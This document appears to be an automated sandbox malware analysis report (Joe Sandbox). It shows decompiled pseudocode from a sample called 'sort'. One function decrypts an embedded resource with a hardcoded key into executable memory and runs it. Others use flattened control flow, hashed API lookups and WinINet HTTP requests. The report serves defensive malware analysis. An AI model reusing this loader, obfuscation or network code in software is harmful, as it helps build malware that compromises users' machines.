								if(_t142 != 0xfef53a6) {
									L23:
									__eflags = _t142 - 0x2ffd856e;
									if(_t142 != 0x2ffd856e) {
										continue;
									} else {
										goto L24;
									}
								} else {
									if( *0x227dfbc == 0) {
										_t101 = E02273F20(0xbb398380);
										_t138 = 0xc0be2284;
										 *0x227dfbc = E02273E80(_t112, _t101, 0xc0be2284, _t145);
									}
									_t100 = CreateFileW( &_v524, _v592, _v584, 0, _v580, _v588, 0); // executed
									_t141 = _t100;
									if(_t141 == 0xffffffff) {
										L24:
										__eflags = 0;
										return 0;
									} else {
										_t142 = 0x28eddbc7;
										continue;
									}
								}
							}
						}
					}
					L30:
				}
				__eflags = _t142 - 0x20540118;
				if(_t142 == 0x20540118) {
					_t142 = 0xa7036f;
					goto L1;
				} else {
					__eflags = _t142 - 0x28eddbc7;
					if(_t142 == 0x28eddbc7) {
						_t103 =  *0x227e1e4;
						__eflags = _t103;
						if(_t103 == 0) {
							_t109 = E02273F20(0xbb398380);
							_t138 = 0xfddf2477;
							_t103 = E02273E80(_t112, _t109, 0xfddf2477, _t145);
							 *0x227e1e4 = _t103;
						}
						 *_t103(_t141, 0,  &_v564, 0x28);
						asm("sbb esi, esi");
						_t106 =  *0x227dc70;
						_t142 = (_t142 & 0xe7c869a6) + 0x2ffd856e;
						__eflags = _t106;
						if(_t106 == 0) {
							_t108 = E02273F20(0xbb398380);
							_t138 = 0x560d239b;
							_t106 = E02273E80(_t112, _t108, 0x560d239b, _t145);
							 *0x227dc70 = _t106;
						}
						 *_t106(_t141);
					}
					goto L23;
				}
				goto L30;
			}

0x02278240
0x02278240
0x02278246
0x0227824e
0x0227825d
0x02278262
0x02278266
0x0227826e
0x02278276
0x0227827e
0x02278290
0x02278294
0x0227829c
0x022782a4
0x022782ae
0x022782b7
0x022782bc
0x022782c4
0x022782cc
0x022782d1
0x022782d9
0x022782e1
0x022782e9
0x022782f1
0x022782f7
0x02278309
0x0227830d
0x02278315
0x02278323
0x02278326
0x0227832a
0x02278332
0x02278332
0x02278332
0x02278338
0x00000000
0x00000000
0x0227833e
0x022783fc
0x02278401
0x02278403
0x0227840a
0x0227840f
0x02278416
0x0227841b
0x0227841b
0x02278425
0x02278427
0x00000000
0x02278344
0x0227834a
0x022783c0
0x022783c5
0x022783c7
0x022783ce
0x022783d3
0x022783da
0x022783df
0x022783df
0x022783f0
0x022783f2
0x00000000
0x0227834c
0x02278352
0x022784cf
0x022784d7
0x022784f7
0x022784fb
0x02278503
0x02278507
0x0227850b
0x02278513
0x02278515
0x00000000
0x02278517
0x02278517
0x0227851e
0x0227852a
0x02278519
0x02278519
0x0227851b
0x00000000
0x00000000
0x00000000
0x00000000
0x0227851b
0x02278517
0x02278358
0x0227835e
0x022784ac
0x022784ac
0x022784b2
0x00000000
0x00000000
0x00000000
0x00000000
0x02278364
0x0227836c
0x02278373
0x02278378
0x02278386
0x02278386
0x022783a9
0x022783ab
0x022783b0
0x022784b8
0x022784b8
0x022784c2
0x022783b6
0x022783b6
0x00000000
0x022783b6
0x022783b0
0x0227835e
0x02278352
0x0227834a
0x00000000
0x0227833e
0x02278431
0x02278437
0x022784c3
0x00000000
0x0227843d
0x0227843d
0x02278443
0x02278445
0x0227844a
0x0227844c
0x02278453
0x02278458
0x0227845f
0x02278464
0x02278464
0x02278473
0x02278477
0x02278479
0x02278484
0x0227848a
0x0227848c
0x02278493
0x02278498
0x0227849f
0x022784a4
0x022784a4
0x022784aa
0x022784aa
0x00000000
0x02278443
0x00000000

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,?,0235BF01,00000000,?,?,00000000,2564BE4F), ref: 022783A9

Strings

J, xrefs: 022782D9

Memory Dump Source

Source File: 00000001.00000002.931690638.0000000002271000.00000020.00000001.sdmp, Offset: 02270000, based on PE: true

Associated: 00000001.00000002.931684475.0000000002270000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931699903.000000000227D000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.931707027.0000000002280000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2270000_sort.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: J
API String ID: 823142352-2715717022
Opcode ID: f7f15390d42a92ce2a08f5a4511da3396046340a2f7d1cbf71d851ffdfa91369
Instruction ID: e9861f9c6d83ccf762c2dfcf4b5addbb64fc85e89a8e0fb9e56b44e68806398a
Opcode Fuzzy Hash: f7f15390d42a92ce2a08f5a4511da3396046340a2f7d1cbf71d851ffdfa91369
Instruction Fuzzy Hash: 4061CF32A193019BC718DFA8D899A2FB7E1BBC4754F00492DF4959B288D7B4C9098F93

Uniqueness

Uniqueness Score: -1.00%

Function 00409C36, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409C36() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00409BF0); // executed
				 *0x439edc = _t1;
				return _t1;
			}

0x00409c3b
0x00409c41
0x00409c46

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00009BF0), ref: 00409C3B

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
Instruction ID: b3cfb7864018c3ddb187660085869e9baaa6efe3d8831d09aec10079f1b62131
Opcode Fuzzy Hash: eaecefe91e68a956ecc4aad3851b8f6e6bc4ba172a0f5c73694e1f4e145b78c8
Instruction Fuzzy Hash: BCA022B02003808FCB20AF20BC3A0203B30F2003A23000032E000802F2EBF02880EF0C

Uniqueness

Uniqueness Score: -1.00%

Function 004013A4, Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 288
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E004013A4(intOrPtr __ecx) {
				void* _v8;
				intOrPtr _v16;
				char _v20;
				char _v36;
				char _v40;
				intOrPtr _v44;
				CHAR* _v52;
				intOrPtr _v64;
				char _v68;
				void* _v72;
				char _v88;
				intOrPtr _v128;
				char _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				void* _v156;
				long _v160;
				char _v176;
				void* _v180;
				intOrPtr _v184;
				char _v200;
				char _v216;
				intOrPtr _v228;
				char _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				char _v252;
				void* _v256;
				struct HINSTANCE__* _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v288;
				char _v292;
				char _v296;
				char _v300;
				char _v316;
				void* _v320;
				intOrPtr _v448;
				intOrPtr _v452;
				intOrPtr _v456;
				intOrPtr _v460;
				intOrPtr _v464;
				intOrPtr _v468;
				intOrPtr _v472;
				void* _t188;
				void* _t189;
				intOrPtr _t244;

				_push(0xffffffff);
				_push(E00429B1F);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t244;
				_v448 = __ecx;
				_v256 = 0;
				_v256 = GetProcAddress(LoadLibraryA("kernel32.dll"), "CreateDirectoryA");
				if(CreateDirectoryA("C:\\Windows\\Microsoft.NET", 0) == 0) {
					_v152 = 0x1e55;
					_v240 = 0x1155;
					_v44 = 0x409;
					_v72 = 0;
					_v160 = 0;
					_v252 = 0xa;
					_v248 = _v152;
					_v244 = _v44;
					_v260 = 0;
					_v176 = _v264;
					E00401AE0( &_v176, 0);
					E00401B90( &_v176, "LdrFin", E00405A40("LdrFin"));
					_v8 = 0;
					_v216 = _v268;
					E00401AE0( &_v216, 0);
					E00401B90( &_v216, "dReso", E00405A40("dReso"));
					_v8 = 1;
					_v36 = _v272;
					E00401AE0( &_v36, 0);
					E00401B90( &_v36, "urce_U", E00405A40("urce_U"));
					_v8 = 2;
					_v452 = E00402030( &_v288,  &_v176,  &_v216);
					_v456 = _v452;
					_v8 = 3;
					E00402030( &_v232, _v456,  &_v36);
					_v8 = 5;
					E00401AE0( &_v288, 1);
					_v200 = _v292;
					E00401AE0( &_v200, 0);
					E00401B90( &_v200, "Ldr", E00405A40("Ldr"));
					_v8 = 6;
					_v144 = _v296;
					E00401AE0( &_v144, 0);
					E00401B90( &_v144, "Acces", E00405A40("Acces"));
					_v8 = 7;
					_v88 = _v300;
					E00401AE0( &_v88, 0);
					E00401B90( &_v88, "sResource", E00405A40("sResource"));
					_v8 = 8;
					_v460 = E00402030( &_v316,  &_v200,  &_v144);
					_v464 = _v460;
					_v8 = 9;
					E00402030( &_v68, _v464,  &_v88);
					_v8 = 0xb;
					E00401AE0( &_v316, 1);
					_v52 = "ntdll.dll";
					if(_v228 != 0) {
						_v468 = _v228;
					} else {
						_v468 = 0x42b704;
					}
					_v184 = _v468;
					if(_v64 != 0) {
						_v472 = _v64;
					} else {
						_v472 = 0x42b704;
					}
					_v128 = _v472;
					_v260 = LoadLibraryA(_v52);
					 *0x437cbc = GetProcAddress(_v260, "LdrFindResource_U");
					 *0x437cb4 = GetProcAddress(_v260, "LdrAccessResource");
					_v236 =  *0x437cbc(0x400000,  &_v252, 3,  &_v40);
					if(_v236 >= 0) {
						_v236 =  *0x437cb4(0x400000, _v40,  &_v72,  &_v160);
					}
					_v180 = 0;
					if(CreateDirectoryA("C:\\ProgramData\\", 0) == 0) {
						_t189 = VirtualAlloc(0, _v160, 0x1000, 0x40); // executed
						_v180 = _t189;
					}
					E00405700(_v180, _v72, _v160);
					E0040107E("@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@", 0x2f,  &_v20);
					E00401163(_v180, _v160,  &_v20);
					_v156 = _v180;
					_v148 = _v156();
					_v320 = 0;
					_v8 = 8;
					E00401AE0( &_v68, 1);
					_v8 = 7;
					E00401AE0( &_v88, 1);
					_v8 = 6;
					E00401AE0( &_v144, 1);
					_v8 = 5;
					E00401AE0( &_v200, 1);
					_v8 = 2;
					E00401AE0( &_v232, 1);
					_v8 = 1;
					E00401AE0( &_v36, 1);
					_v8 = 0;
					E00401AE0( &_v216, 1);
					_v8 = 0xffffffff;
					E00401AE0( &_v176, 1);
					_t188 = _v320;
				} else {
					_t188 = 0;
				}
				 *[fs:0x0] = _v16;
				return _t188;
			}

APIs

LoadLibraryA.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 004013DC
GetProcAddress.KERNEL32(00000000), ref: 004013E3
CreateDirectoryA.KERNELBASE(C:\Windows\Microsoft.NET,00000000), ref: 004013F6

Strings

C:\ProgramData\, xrefs: 00401751
C:\Windows\Microsoft.NET, xrefs: 004013F1
LdrFin, xrefs: 00401475, 00401483
LdrAccessResource, xrefs: 004016E7
@P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@, xrefs: 0040179C
LdrFindResource_U, xrefs: 004016D0
Ldr, xrefs: 0040157E, 0040158C
Acces, xrefs: 004015B9, 004015C7
dReso, xrefs: 004014B3, 004014C1
urce_U, xrefs: 004014E8, 004014F6
CreateDirectoryA, xrefs: 004013D2
kernel32.dll, xrefs: 004013D7
sResource, xrefs: 004015EE, 004015FC

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: AddressCreateDirectoryLibraryLoadProc
String ID: @P*w$@?97wKE9+Vey0babhTz2gVn_0Xb5q5sACHJ$qpLa@$Acces$C:\ProgramData\$C:\Windows\Microsoft.NET$CreateDirectoryA$Ldr$LdrAccessResource$LdrFin$LdrFindResource_U$dReso$kernel32.dll$sResource$urce_U
API String ID: 3952968459-2121162702
Opcode ID: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
Instruction ID: 061a306ec623a826179d85857fa582b4a8c01ab5e49a60f3ccf10d5f337b011f
Opcode Fuzzy Hash: 7d620622b5630e1590437648c71b2aba6933f66f18f5174dfcf6b2e9e6efda78
Instruction Fuzzy Hash: BDD14070E41258ABDB20DB90DD56BEEB7B4AB18304F1081EAE509772D1DBB81F84CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0042592B, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0042592B() {
				void* __ecx;
				void* __ebp;
				struct _CRITICAL_SECTION* _t36;
				void* _t37;
				struct _CRITICAL_SECTION* _t42;
				signed char* _t58;
				void* _t61;
				void* _t63;
				void* _t65;
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;

				_t71 = _t65;
				_t1 = _t71 + 0x1c; // 0x4399c8
				_t36 = _t1;
				 *(_t74 + 0x14) = _t36;
				EnterCriticalSection(_t36);
				_t3 = _t71 + 4; // 0x20
				_t72 =  *_t3;
				_t4 = _t71 + 8; // 0x4
				_t70 =  *_t4;
				if(_t70 >= _t72) {
					L2:
					_t70 = 1;
					if(_t72 <= _t70) {
						L7:
						_t13 = _t71 + 0x10; // 0x4c0158
						_t37 =  *_t13;
						_t73 = _t72 + 0x20;
						if(_t37 != 0) {
							_t61 = GlobalHandle(_t37);
							GlobalUnlock(_t61);
							_t42 = GlobalReAlloc(_t61, _t73 << 3, 0x2002);
						} else {
							_t42 = GlobalAlloc(0x2002, _t73 << 3); // executed
						}
						 *(_t74 + 0x10) = _t42;
						if(_t42 == 0) {
							_t15 = _t71 + 0x10; // 0x4c0158
							GlobalLock(GlobalHandle( *_t15));
							_t16 = _t74 + 0x14; // 0x406468
							LeaveCriticalSection( *_t16);
							E0041007F(_t65);
						}
						_t63 = GlobalLock( *(_t74 + 0x10));
						_t18 = _t71 + 4; // 0x20
						E00406330(_t63 +  *_t18 * 8, 0,  *_t18 * 0x1fffffff + _t73 << 3);
						_t74 = _t74 + 0xc;
						 *(_t71 + 0x10) = _t63;
						 *(_t71 + 4) = _t73;
					} else {
						_t10 = _t71 + 0x10; // 0x4c0158
						_t58 =  *_t10 + 8;
						while(( *_t58 & 0x00000001) != 0) {
							_t70 = _t70 + 1;
							_t58 =  &(_t58[8]);
							if(_t70 < _t72) {
								continue;
							}
							break;
						}
						if(_t70 >= _t72) {
							goto L7;
						}
					}
				} else {
					_t5 = _t71 + 0x10; // 0x4c0158
					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
						goto L2;
					}
				}
				_t23 = _t71 + 0xc; // 0x4
				if(_t70 >=  *_t23) {
					_t24 = _t70 + 1; // 0x5
					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
				}
				_t26 = _t71 + 0x10; // 0x4c0158
				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
				_t34 = _t70 + 1; // 0x5
				 *(_t71 + 8) = _t34;
				LeaveCriticalSection( *(_t74 + 0x10));
				return _t70;
			}

APIs

EnterCriticalSection.KERNEL32(004399C8,004397CC,00000000,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042593A
GlobalAlloc.KERNELBASE(00002002,00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 0042598F
GlobalHandle.KERNEL32 ref: 00425998
GlobalUnlock.KERNEL32(00000000,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259A1
GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 004259B3
GlobalHandle.KERNEL32 ref: 004259CA
GlobalLock.KERNEL32 ref: 004259D1
LeaveCriticalSection.KERNEL32(hd@,?,?,004399AC,004399AC,00425CC6,?,00000000,00424C0A,0042440D,00424C26,00412700,0041843C,?,00000000), ref: 004259D7
GlobalLock.KERNEL32 ref: 004259E6
LeaveCriticalSection.KERNEL32(?), ref: 00425A2F

Strings

hd@, xrefs: 004259D3

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
String ID: hd@
API String ID: 2667261700-3469257913
Opcode ID: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
Instruction ID: 9ab521ae17bdcbf38e6808dd3f3d9ead1f2f8e9119152a2daa84f5c479dd3fff
Opcode Fuzzy Hash: eb85e0a3062991710bc79dfb75425efaf453fe1be3974bf155bbcf5f35719e79
Instruction Fuzzy Hash: C83181B1304709DFD7249F28EC89A2BB7E8FB44314B404A6EE892D3661D775F845CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004171BC, Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004171BC(void* __ecx) {
				int _t6;
				struct HDC__* _t17;
				void* _t18;

				_t18 = __ecx;
				_t6 = GetSystemMetrics(0xb); // executed
				 *((intOrPtr*)(_t18 + 8)) = _t6;
				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
					E00426041();
				} else {
					E00426011();
				}
				_t17 = GetDC(0);
				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
				return ReleaseDC(0, _t17);
			}

0x004171c5
0x004171c9
0x004171cd
0x004171d6
0x004171d9
0x004171e2
0x004171db
0x004171db
0x004171db
0x004171f5
0x004171ff
0x00417207
0x00417213

APIs

KiUserCallbackDispatcher.NTDLL ref: 004171C9
GetSystemMetrics.USER32 ref: 004171D0
GetDC.USER32(00000000), ref: 004171E9
GetDeviceCaps.GDI32(00000000,00000058), ref: 004171FA
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417202
ReleaseDC.USER32 ref: 0041720A

Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 00426023
Part of subcall function 00426011: GetSystemMetrics.USER32 ref: 0042602D

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$CallbackDispatcherReleaseUser
String ID:
API String ID: 1031845853-0
Opcode ID: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
Instruction ID: 659ed99cd56d5ad3ccdcd4dadc3a54c49a5c6667fc5102f6d19300758eb0a966
Opcode Fuzzy Hash: 49e5c97296a7b072187f1378aed9eba7ef52a70a37e1ec16940f220f5672bfea
Instruction Fuzzy Hash: BBF03030740704AEE230AB629C89B67B7A4EF80755F51442FFA0196290CFB498459FA9

Uniqueness

Uniqueness Score: -1.00%

Function 02272C20, Relevance: 7.8, APIs: 5, Instructions: 287
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 76%

			E02272C20(void* __ecx, void* __edx) {
				void* __ebx;
				void* __ebp;
				void* _t36;
				void* _t38;
				void* _t40;
				void* _t47;
				signed int _t51;
				void* _t52;
				void* _t58;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t65;
				void* _t66;
				WCHAR* _t68;
				void* _t83;
				void* _t87;
				void* _t132;
				void* _t133;
				void* _t135;
				void* _t136;
				void* _t138;
				WCHAR* _t140;
				long _t142;
				void* _t146;
				void* _t147;
				void* _t150;
				void* _t151;

				_t146 =  *(_t147 + 0x3c);
				 *(_t147 + 0x30) = __ecx;
				_t136 = 0x21ed7693;
				_t83 =  *(_t147 + 0x30);
				 *(_t147 + 0x30) = __edx;
				 *(_t147 + 0x14) = 0;
				 *(_t147 + 0x24) = 0;
				 *(_t147 + 0x20) = 0;
				 *(_t147 + 0x10) = 0;
				while(1) {
					L1:
					_t132 =  *(_t147 + 0x18);
					while(1) {
						L2:
						_t150 = _t136 - 0xdefb712;
						if(_t150 > 0) {
							goto L36;
						}
						L3:
						if(_t150 == 0) {
							__eflags =  *0x227e12c;
							if( *0x227e12c == 0) {
								 *0x227e12c = E02273E80(_t83, E02273F20(0x2ba535f4), 0xc71f7f57, _t146);
							}
							_t36 = InternetOpenW( *(_t147 + 0x24), 0, 0, 0, 0); // executed
							__eflags = _t36;
							 *(_t147 + 0x1c) = _t36;
							_t136 =  !=  ? 0x2a5ea3fb : 0xe955358;
							_t38 =  *0x227dea8;
							__eflags = _t38;
							if(_t38 == 0) {
								_t38 = E02273E80(_t83, E02273F20(0xbb398380), 0x97f883e, _t146);
								 *0x227dea8 = _t38;
							}
							_t133 =  *_t38();
							_t40 =  *0x227e1a0;
							__eflags = _t40;
							if(_t40 == 0) {
								_t40 = E02273E80(_t83, E02273F20(0xbb398380), 0x26c3f343, _t146);
								 *0x227e1a0 = _t40;
							}
							 *_t40(_t133, 0,  *(_t147 + 0x14));
							goto L34;
						} else {
							_t151 = _t136 - 0x67ae942;
							if(_t151 > 0) {
								__eflags = _t136 - 0x6b479f3;
								if(_t136 == 0x6b479f3) {
									__eflags =  *0x227e128;
									if( *0x227e128 == 0) {
										 *0x227e128 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x6972c784, _t146);
									}
									InternetCloseHandle(_t83); // executed
									_t136 = 0x12dff647;
									continue;
								} else {
									__eflags = _t136 - 0x8581448;
									if(_t136 != 0x8581448) {
										goto L34;
									} else {
										__eflags = _t146;
										if(_t146 == 0) {
											_t140 =  *(_t147 + 0x20);
										} else {
											_t140 = E022734C0(0x227d1f0);
											 *(_t147 + 0x20) = _t140;
										}
										_t52 =  *0x227e1cc;
										__eflags = _t52;
										if(_t52 == 0) {
											_t52 = E02273E80(_t83, E02273F20(0x2ba535f4), 0xc136cec1, _t146);
											 *0x227e1cc = _t52;
										}
										_t83 =  *_t52(_t132, _t140,  *((intOrPtr*)(_t147 + 0x50)), 0, 0, 0, 0x844cc300, 0);
										E02273460(_t140);
										__eflags = _t83;
										_t136 =  !=  ? 0x4e6dd92 : 0x12dff647;
										continue;
									}
								}
							} else {
								if(_t151 == 0) {
									__eflags = E022729B0(_t83,  *((intOrPtr*)(_t147 + 0x48)));
									_t87 =  !=  ? 1 :  *(_t147 + 0x10);
									__eflags = _t87;
									 *(_t147 + 0x10) = _t87;
									L15:
									_t136 = 0x6b479f3;
									continue;
								} else {
									if(_t136 == 0x1e6c40f) {
										_t47 =  *0x227e128;
										__eflags = _t47;
										if(_t47 == 0) {
											_t47 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x6972c784, _t146);
											 *0x227e128 = _t47;
										}
										 *_t47( *(_t147 + 0x1c));
									} else {
										if(_t136 != 0x4e6dd92) {
											L34:
											__eflags = _t136 - 0xe955358;
											if(_t136 != 0xe955358) {
												goto L1;
											}
										} else {
											if(_t146 == 0) {
												_t142 = 0;
												_t135 = 0;
												__eflags = 0;
											} else {
												_t142 =  *(_t146 + 4);
												_t135 =  *_t146;
											}
											if( *0x227e20c == 0) {
												 *0x227e20c = E02273E80(_t83, E02273F20(0x2ba535f4), 0x182fe063, _t146);
											}
											_t51 = HttpSendRequestW(_t83,  *(_t147 + 0x4c), 0xffffffff, _t135, _t142); // executed
											asm("sbb esi, esi");
											_t136 = ( ~_t51 & 0x1a4d9a07) + 0x6b479f3;
											while(1) {
												L1:
												_t132 =  *(_t147 + 0x18);
												while(1) {
													L2:
													_t150 = _t136 - 0xdefb712;
													if(_t150 > 0) {
														goto L36;
													}
													goto L3;
												}
												goto L36;
											}
										}
									}
								}
							}
						}
						L64:
						return  *(_t147 + 0x10);
						L65:
						L36:
						__eflags = _t136 - 0x210213fa;
						if(__eflags > 0) {
							__eflags = _t136 - 0x21ed7693;
							if(_t136 == 0x21ed7693) {
								_t136 = 0x1e47f06d;
								continue;
							} else {
								__eflags = _t136 - 0x2a5ea3fb;
								if(_t136 != 0x2a5ea3fb) {
									goto L34;
								} else {
									__eflags =  *0x227e178;
									if( *0x227e178 == 0) {
										 *0x227e178 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x48c489b5, _t146);
									}
									_t58 = InternetConnectW( *(_t147 + 0x38),  *(_t147 + 0x4c),  *(_t147 + 0x44), 0, 0, 3, 0, 0); // executed
									_t132 = _t58;
									__eflags = _t132;
									 *(_t147 + 0x18) = _t132;
									_t136 =  !=  ? 0x8581448 : 0x1e6c40f;
									continue;
								}
							}
						} else {
							if(__eflags == 0) {
								_t60 =  *0x227dde8;
								 *((intOrPtr*)(_t147 + 0x28)) = 4;
								__eflags = _t60;
								if(_t60 == 0) {
									_t60 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x46124712, _t146);
									 *0x227dde8 = _t60;
								}
								_t61 =  *_t60(_t83, 0x20000013, _t147 + 0x34, _t147 + 0x2c, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L15;
								} else {
									__eflags =  *((intOrPtr*)(_t147 + 0x2c)) - 0xc8;
									if( *((intOrPtr*)(_t147 + 0x2c)) != 0xc8) {
										goto L15;
									} else {
										_t136 = 0x67ae942;
										continue;
									}
								}
								goto L65;
							} else {
								__eflags = _t136 - 0x12dff647;
								if(_t136 == 0x12dff647) {
									_t62 =  *0x227e128;
									__eflags = _t62;
									if(_t62 == 0) {
										_t62 = E02273E80(_t83, E02273F20(0x2ba535f4), 0x6972c784, _t146);
										 *0x227e128 = _t62;
									}
									 *_t62(_t132);
									_t136 = 0x1e6c40f;
									continue;
								} else {
									__eflags = _t136 - 0x1e47f06d;
									if(_t136 != 0x1e47f06d) {
										goto L34;
									} else {
										 *(_t147 + 0x24) = 0x200;
										_t138 = E022742F0(_t83, 0x200);
										__eflags = _t138;
										if(_t138 != 0) {
											_t65 =  *0x227dbf0;
											__eflags = _t65;
											if(_t65 == 0) {
												_t65 = E02273E80(_t83, E02273F20(0x50c9f0c1), 0xd16bf1bd, _t146);
												 *0x227dbf0 = _t65;
											}
											_t66 =  *_t65(0, _t138, _t147 + 0x24); // executed
											__eflags = _t66;
											if(_t66 == 0) {
												_t68 = E022756A0(_t138, _t146);
												_t147 = _t147 - 8 + 8;
												 *(_t147 + 0x14) = _t68;
											}
											E02274250(_t83, _t138);
										}
										_t136 = 0xdefb712;
										continue;
									}
								}
							}
						}
						goto L64;
					}
				}
			}

0x02272c25
0x02272c2c
0x02272c30
0x02272c35
0x02272c3a
0x02272c3e
0x02272c46
0x02272c4e
0x02272c56
0x02272c5a
0x02272c5a
0x02272c5a
0x02272c60
0x02272c60
0x02272c60
0x02272c66
0x00000000
0x00000000
0x02272c6c
0x02272c6c
0x02272dcf
0x02272dd1
0x02272de9
0x02272de9
0x02272dfa
0x02272dfc
0x02272dfe
0x02272e0c
0x02272e0f
0x02272e14
0x02272e16
0x02272e29
0x02272e2e
0x02272e2e
0x02272e35
0x02272e37
0x02272e3c
0x02272e3e
0x02272e51
0x02272e56
0x02272e56
0x02272e62
0x00000000
0x02272c72
0x02272c72
0x02272c78
0x02272d15
0x02272d1b
0x02272d9e
0x02272da0
0x02272db8
0x02272db8
0x02272dbe
0x02272dc0
0x00000000
0x02272d1d
0x02272d1d
0x02272d23
0x00000000
0x02272d29
0x02272d29
0x02272d2b
0x02272d3f
0x02272d2d
0x02272d37
0x02272d39
0x02272d39
0x02272d43
0x02272d48
0x02272d4a
0x02272d5d
0x02272d62
0x02272d62
0x02272d7e
0x02272d80
0x02272d85
0x02272d91
0x00000000
0x02272d91
0x02272d23
0x02272c7e
0x02272c7e
0x02272cfd
0x02272d04
0x02272d04
0x02272d07
0x02272d0b
0x02272d0b
0x00000000
0x02272c80
0x02272c86
0x02273008
0x0227300d
0x0227300f
0x02273022
0x02273027
0x02273027
0x02273030
0x02272c8c
0x02272c92
0x02272e64
